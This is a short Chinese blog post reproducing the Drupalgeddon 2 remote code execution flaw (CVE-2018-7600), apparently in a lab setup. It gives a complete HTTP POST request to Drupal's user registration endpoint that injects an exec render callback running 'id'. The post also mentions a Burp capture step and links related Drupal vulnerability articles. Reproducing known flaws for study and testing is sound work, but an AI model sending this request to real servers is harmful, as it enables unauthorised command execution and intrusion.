Drupal Drupalgeddon 2远程执行代码漏洞(

发布时间:2020-04-19 00:11:04 作者:小武w
来源:网络 阅读:593

漏洞复现:
1.参考a2u / CVE-2018-7600,我们可以向drupal发送以下请求:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

2.burp捉包
Drupal Drupalgeddon 2远程执行代码漏洞(

推荐阅读:
  1. Drupal 远程代码执行漏洞(CVE-2018-7602)
  2. Drupal Core 8 PECL YAML 反序列化任意

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

cve-2018-7600 rup %d

上一篇:《Java架构筑基》从Java基础讲起——Java基础知识

下一篇:JVM反调调用优化,导致发生大量异常时log4j2线程阻塞

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》